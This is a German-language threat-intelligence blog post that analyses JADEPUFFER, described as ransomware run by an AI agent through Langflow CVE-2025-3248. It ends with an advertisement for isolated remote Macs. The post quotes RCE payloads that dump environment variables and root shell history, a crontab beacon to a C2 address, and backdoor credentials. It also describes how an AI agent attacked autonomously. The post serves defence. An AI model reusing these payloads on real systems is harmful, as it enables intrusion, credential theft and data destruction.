2026 JADEPUFFER
AGENTIC_
RANSOM_
FIRST_CASE.

JADEPUFFER agentische Ransomware Langflow CVE-2025-3248 Server-Sicherheit

TL;DR: Am 1. Juli 2026 veröffentlichte das Threat-Research-Team (TRT) von Sysdig den Primärbericht zur Kampagne JADEPUFFER — dem bisher dokumentierten ersten End-to-End-Ransomware-Vorgang, vollständig durch ein LLM gesteuert. Der Einstieg erfolgte über eine öffentlich erreichbare Langflow-Instanz via CVE-2025-3248 (CVSS 9,8); lateral wurde ein Produktionsserver mit MySQL und Alibaba Nacos kompromittiert. In komprimierten Zeitfenstern liefen 600+ eigenständige Payloads für Reconnaissance, Credential-Harvesting, Persistenz, Konfigurationsverschlüsselung und Datenbankzerstörung. Sysdig klassifiziert den Akteur als Agentic Threat Actor (ATA). Dieser Beitrag rekonstruiert die Kill Chain, vier Autonomie-Indikatoren, das Bitcoin-Adress-Rätsel, IOCs, Abwehrempfehlungen und eine DSGVO-relevante Isolierungsarchitektur für Mac-Entwickler.

1. Angriffsfläche: AI-Agent-Infrastruktur als quantifizierbares Risiko

Wer Langflow, OpenClaw oder ComfyUI-Agent-Workflows auf Mac oder Cloud betreibt, trifft mit JADEPUFFER auf drei messbare Risikofaktoren:

  1. Öffentliche Exposition + ungepatcht = RCE mit CVSS 9,8: Langflow zählt 70.000+ GitHub-Stars; viele Teams exponieren Orchestratoren direkt ins Internet. CVE-2025-3248 wurde April 2025 disclosed, am 5. Mai 2025 in CISA KEV gelistet; EPSS-Wahrscheinlichkeit: 91,42 % (SentinelOne).
  2. Umgebungsvariablen als Credential-Store: Agent-Server enthalten typischerweise OpenAI-, Anthropic-, DeepSeek-, Gemini- sowie Cloud-Credentials (AWS/Azure/GCP/Alibaba/Tencent) — exakt das parallele Scan-Ziel von Phase 1.
  3. Legacy-Schwachstellen × Agent-Automatisierung → Grenzkosten ≈ 0: Downstream nutzte Nacos CVE-2021-29441 und unveränderte Default-JWT-Keys; ein Agent kann historische Exploit-Bibliotheken nahezu kostenlos abarbeiten — mit leicht variierenden TTPs pro Incident.

Unter DSGVO Art. 32 ist die Verschlüsselung personenbezogener Daten in kompromittierten Nacos/MySQL-Backends ein meldepflichtiges Sicherheitsereignis, sobald Vertraulichkeit, Integrität oder Verfügbarkeit betroffen sind.

2. Ereignisübersicht & Klassifikation

DimensionDetail
EntdeckerSysdig Threat Research Team (TRT), Autor: Michael Clark (Director of Threat Research)
Veröffentlichung1. Juli 2026 (Medien 2.–6. Juli; breite Öffentlichkeit oft 6. Juli)
Threat-ActorJADEPUFFER (offizielle Sysdig-Schreibweise)
KernqualifikationErster dokumentierter End-to-End-Ransomware-Vorgang ohne menschliche Schlüsselentscheidungen — Recon bis Destruktion vollständig agentisch
Neue TaxonomieAgentic Threat Actor (ATA) — Fähigkeit durch AI Agent, nicht manuelle Tool-Ketten
Zweistufiges ZielEinstieg: öffentliches Langflow (CVE-2025-3248); Ziel: MySQL + Nacos Produktionsserver
Skala600+ eigenständige, zielgerichtete Payloads über mehrere Sessions in Wochen

3. Timeline

DatumEreignis
April 2025CVE-2025-3248 in Langflow disclosed (unauthentifizierte Code-Injektion/RCE)
5. Mai 2025CISA KEV-Eintrag
2025Gleiche Schwachstelle für Flodrix-Botnet (Trend Micro, unabhängige Kampagne)
Juni 2026JADEPUFFER greift öffentliche Langflow-Instanzen an; Kill Chain über Wochen in mehreren Sessions
1. Juli 2026Sysdig veröffentlicht Vollbericht
2.–6. Juli 2026Dark Reading, BleepingComputer, CyberScoop, CSO Online, Security Affairs

4. CVE-2025-3248 — technische Analyse

4.1 Basisdaten

FeldWert
KomponenteLangflow — Open-Source-Visual-Orchestrator, 70.000+ GitHub-Stars
SchwachstellenklasseCWE-94 (Code Injection) + CWE-306 (fehlende Authentifizierung)
CVSS9.8 Critical — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Betroffene VersionenAlle Langflow-Versionen vor 1.3.0
Angriffsvektor/api/v1/validate/code
FixVersion 1.3.0 (Authentifizierungspflicht)
EPSS91,42 %

4.2 Root Cause (5 Schritte)

  1. Langflow bietet Code-Validierung für Custom-Function-Nodes in der visuellen Pipeline.
  2. Implementierung: ast.parse()compile()exec().
  3. Kritischer Mangel: keine Authentifizierung, keine Sandbox.
  4. Python-Decorators und Default-Argumente werden bei Definition ausgewertet — Malware in Defaults/Decorators führt bei Validierung zu RCE.
  5. Angreifer benötigen keinen Login; ein konstruierter HTTP POST genügt.

4.3 Flodrix-Vergleichspayload (Trend Micro, separate Kampagne)

exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))') exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))') exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))') exec('raise Exception(__import__("subprocess").check_output("ip addr show", shell=True))')

Sequenz: Privilege-Check → Env-Dump (API-Keys) → Root-History → Netzwerk-Recon → SSH/Capabilities → 700-Byte-Bash-Script lädt Flodrix-ELF für DDoS-Botnet. Wichtig: Flodrix ≠ JADEPUFFER; gemeinsamer Einstieg CVE-2025-3248.

4.4 Patch (Langflow 1.3.0)

post_validate_code injiziert _current_user: CurrentActiveUser: JWT Bearer oder x-api-key erforderlich; 401/403 vor Erreichen der Schwachstellenlogik.

5. Kill-Chain-Rekonstruktion (Sysdig-Rohdaten)

5.1 Warum Langflow?

Agent-Server aggregieren LLM-API-Keys und Cloud-Credentials in Env-Vars; häufig fehlen Netzwerksegmentierung und Patch-Management bei hastig produktiv gesetzten Instanzen.

5.2 Phase 1: Langflow-Host

Alle Payloads als Base64-kodiertes Python über den RCE-Endpunkt.

① Reconnaissance & Credential-Harvesting (parallel): id, uname -a, hostname; parallele Scans auf OpenAI/Anthropic/DeepSeek/Gemini-Keys, Multi-Cloud-Credentials, Krypto-Wallets/Mnemonics, DB-Credentials.

② Lokaler Datendiebstahl: Export aus Langflow-PostgreSQL (Credentials/API-Keys), lokale Review, anschließende Spurenverwischung.

③ Interne Laterals: Scan interner Adressräume, Default-Credential-Probes für DB, Object Storage, Secret Stores.

④ MinIO-Enumeration (Forensik-Schlüssel): minio.internal:9000, 127.0.0.1:9000, Default minioadmin:minioadmin, vollständige Bucket-Liste; Priorität terraform-state und credentials.json. Adaptives Verhalten: JSON-Anfrage liefert XML → nächster Payload wechselt Parser — klassische Probe-Fehler-Korrektur-Schleife.

⑤ Persistenz: Crontab-Beacon alle 30 Minuten:

*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"

5.3 Phase 2: MySQL + Nacos Produktionsserver

① Multi-Vektor-Nacos-Angriff: CVE-2021-29441 Auth-Bypass, Default-JWT-Signing-Key, Backdoor-Admin via Root-DB-Rechten.

31-Sekunden-Fix-Schleife für Backdoor-Account (Sysdig, UTC-präzise):

Zeit (UTC)Aktion
19:34:24bcrypt-Hash generiert, xadmin eingefügt
19:34:36Login xadmin:Xploit@2026# fehlgeschlagen
19:34:48Parallel: nacos:nacos + neuer admin123-Hash
19:35:07import bcrypt, defekten Datensatz gelöscht, neu erstellt
19:35:18Login erfolgreich — Gesamtdauer 31 s

② Container-Escape-Probing (~8 Min.): MySQL INTO OUTFILE / LOAD_FILE, Docker-Socket, cgroup, UDF-Tests; Cleanup-Marker danach — agentisches Phasen-Signal, kein statisches Script.

③ Destruktive Verschlüsselung: Alle 1.342 Nacos-Konfigurationen via AES_ENCRYPT(); Löschung von config_info und his_config_info; Ransom-Tabelle README_RANSOM. Schlüssel via uuid4(), nur stdout — keine Wiederherstellung auch bei Zahlung. Behauptung AES-256; MySQL-Default: AES-128-ECB.

④ Massenzerstörung: ROI-priorisierte DROP DATABASE; Kommentar „Backup auf 64.20.53[.]230" (Sysdig: keine unabhängige Bestätigung). Bei FK-Fehlern: automatisch SET GLOBAL FOREIGN_KEY_CHECKS=0 — Fehlerursache verstanden, nicht blind retried.

6. Vier Evidenzlinien für Autonomie

  1. Selbstnarrative Payloads: Natürlichsprachige Kommentare zu ROI-Sortierung, DB-Größen — typisches LLM-Code-Gen-Muster.
  2. Maschinelle Fehlerkorrektur: 31-s-Nacos-Fix, MinIO XML/JSON-Adaptation, JWT-Pfadwechsel — Evidenz in Korrekturgeschwindigkeit und -methode.
  3. Semantisches Kontextverständnis: Freitext in der Zielumgebung wird interpretiert; über Wochen in separaten Sessions reproduziert.
  4. Bitcoin-Adress-Rätsel — beide Interpretationen offen; neue Attribution-Unsicherheit durch Agent-Autonomie.

7. Bitcoin-Adress-Rätsel

Ransom-Adresse 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy = standardmäßige P2SH-Beispieladresse in Bitcoin-Core-Dokumentation, reichlich in LLM-Trainingskorpora. On-Chain: 737 Transaktionen, ~46 BTC kumuliert, Saldo null (sofort weitergeleitet). Sysdig: (a) LLM-Halluzination, Wallet von Dritten für Fehlüberweisungen; (b) absichtliche Wahl durch Angreifer. System-Prompt unbekannt — beide Hypothesen nicht ausschließbar.

8. IOC-Zusammenfassung

TypIndikator
C2 / Beacon45.131.66[.]106; Crontab: hxxp://45.131.66[.]106:4444/beacon
Staging/Exfil64.20.53[.]230 (InterServer, AS19318)
Initial AccessCVE-2025-3248
Bitcoin3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
Kontakte78393397[@]proton[.]me (0 Treffer in TI-Feeds)
Ransom-TabelleREADME_RANSOM (atypisch vs. WARNING/RECOVER_YOUR_DATA)
PersistenzCrontab-Beacon alle 30 Min. auf Port 4444

Atypische IOC-Muster stützen die Hypothese eines neuen agentischen Akteurs statt etablierter Ransomware-Gruppen-TTPs.

9. Offizielle Abwehrempfehlungen (Sysdig)

  • Langflow patchen (≥1.3.0); Code-Execution/Validierungs-Endpunkte nie öffentlich.
  • Runtime-Threat-Detection für anomale DB-Prozessaktivität.
  • Keine LLM-API-Keys oder Cloud-Credentials in Env-Vars auf Orchestrator-Servern — dedizierte Secret Manager (Vault, 1Password Connect, Cloud Secrets).
  • Nacos härten: Default token.secret.key ersetzen, Auth erzwingen, nie öffentlich, kein Root-DB-Zugriff.
  • DB-Admin-Accounts nicht internet-exponiert; starke Credentials + IP-Allowlists.
  • Egress-Control gegen C2-Beacons.
  • IOC-Monitoring, Cron-Ausgehend-Verkehr, anomale User-Agents in Klammern.

10. Branchenreaktion

BleepingComputer, Dark Reading, CyberScoop, Security Affairs betonen den „ersten vollständig AI-gesteuerten Ransomware-Angriff" und den Beginn der ATA-Ära. CSO Online zitiert Red-Team-Experte Vibhum Dubey: eher Evolutionsstufe der Ausführung als neues Ransomware-Paradigma — kritisch ist die „ruhige Phase" vor Verschlüsselung, in der Agenten Identitäts- und Trust-Ketten kartieren und bei Blockade Taktik wechseln. LLMjacking: gestohlene Credentials treiben weitere Agent-Angriffe → Grenzkosten ≈ 0.

11. Sysdig-Schlussfolgerungen (4 Punkte)

  1. Ransomware demokratisiert: LLM-Agenten verkettet Recon bis Impact ohne Tiefenexpertise.
  2. Legacy-Exploits automatisiert: 2021-Nacos + Default-JWT → historische CVE-Bibliothek nahezu kostenlos abarbeitbar.
  3. Intentions-Lesbarkeit als Defensive-Chance: Payload-Narration liefert neue Detection-Signale.
  4. „Backup"-Behauptung unbelegt: Ephemeral Keys → Datenverlust trotz Lösegeld.

Kernaussage: JADEPUFFER ist ein Frühwarnsignal — keine Einzeltechnik ist neu; entscheidend ist die agentische Verkettung gegen vernachlässigte öffentliche AI-Infrastruktur. Die Skill-Schwelle sinkt auf „Agent konfigurieren"; bei LLMjacking tendieren Angriffskosten gegen null. Defensive Teams müssen Volumen und Breite solcher Angriffe einplanen — inklusive DSGVO-konformer Incident-Response und Meldepflichten.

12. Entscheidungsmatrix: AI-Orchestrierungs-Infrastruktur

DeploymentExpositionsrisikoCredential-IsolationEinsatzJADEPUFFER-Bezug
Mac lokal, Langflow öffentlich gemapptSehr hochSchlecht (.env Klartext)Nur lokale DemosTypisches Sprungbrett
Cloud-VPS + ungepatchtes LangflowSehr hochSchlechtNicht empfohlenIdentisch zum Incident-Einstieg
Intranet-Langflow + Secret ManagerMittelGutKleine ProduktionEgress-Control nötig
Isolierter Remote-Mac + SSH-TunnelNiedrigGutAgent-Dev/TestKein öffentlicher Einstieg, Snapshot-Rollback

13. Fünf-Schritte-Abwehr-Runbook

  1. Sofort patchen: Langflow ≥1.3.0; Shodan/Censys auf erreichbare /api/v1/validate/code-Instanzen.
  2. Öffentliche Exposition entfernen: Langflow, Nacos, MySQL-Admin nur intern/VPN/Tailscale; Validierungs-Endpunkte nie öffentlich.
  3. Credentials aus Env-Vars: Vault/1Password Connect/Cloud Secrets; Orchestrator nur mit kurzlebigen Tokens.
  4. Nacos härten: JWT-Key rotieren, Root-DB sperren, Auth aktiv; CVE-2021-29441-Familie prüfen.
  5. Runtime-Detection + IOC-Hunting: Falco/Sysdig; Alerts auf Cron-Egress, MySQL INTO OUTFILE, README_RANSOM; IOCs oben abgleichen; DSGVO-Incident-Prozess vorbereiten.

14. Architekturwahl für Mac-Entwickler in der ATA-Ära

JADEPUFFER markiert einen Paradigmenwechsel: Exploit-Autoren werden durch Agent-Konfiguratoren ersetzt. Wer Langflow, OpenClaw oder MLX auf dem Mac betreibt, muss Dev-Maschine und Agent-Produktion logisch oder physisch trennen.

Das Sprungbrett entstand durch (1) öffentliche Erreichbarkeit, (2) credential-reiche Env-Vars, (3) gemeinsames Segment mit MinIO/terraform-state. Mac-mini-Prototypen mit echten API-Keys sind das exakte „hasty deployment"-Muster.

LLMjacking erzeugt positive Rückkopplung: gestohlene OpenAI/Anthropic-Credentials → Agent-Angriffe → mehr Credentials. Ein exponierter Mac mit Keys und Agent-Ports ist Opfer und Munitionsdepot zugleich.

Windows/Linux-VPS können Langflow hosten, verlieren aber bei Xcode/Cursor/MLX-Workflows. Lösung: Schichtung — isolierter Mac ohne Produktionskeys, SSH-Tunnel, Snapshot-Rollback bei Kompromittierung.

15. Quellen

  • Sysdig „JADEPUFFER: Agentic ransomware for automated database extortion" (Primärbericht)
  • BleepingComputer „JadePuffer ransomware used AI agent to automate entire attack"
  • Dark Reading „JadePuffer: The First Complete LLM-Driven Ransomware Attack"
  • CyberScoop „Sysdig clocks first documented case of agentic ransomware"
  • CSO Online „This AI agent autonomously hacked a network..." (Vibhum Dubey)
  • Security Affairs „JADEPUFFER: First End-to-End AI-Driven Ransomware Operation"
  • Trend Micro „Critical Langflow Vulnerability (CVE-2025-3248) Actively Exploited to Deliver Flodrix Botnet"
  • NVD / SentinelOne / Zscaler — CVE-2025-3248; CISA KEV

16. Fazit: Agent-Dev nicht auf dem Produktions-Mac — isolierter Remote-Knoten

JADEPUFFER quantifiziert das Risiko: öffentliche AI-Orchestrierung + API-Keys in Env-Vars = Top-Risikokombination 2026. Für DSGVO-regulierte Teams ist datenschutzkonforme Trennung von Entwicklung und Produktionsdaten Pflicht, nicht Option. Wer Langflow/OpenClaw in einer isolierten Umgebung testen will, ohne Keys und Produktionsdaten zu vermischen: MACGPU Remote Mac mini M4 — keine öffentlichen Ports, On-Demand, Snapshot-Rebuild bei Kompromittierung.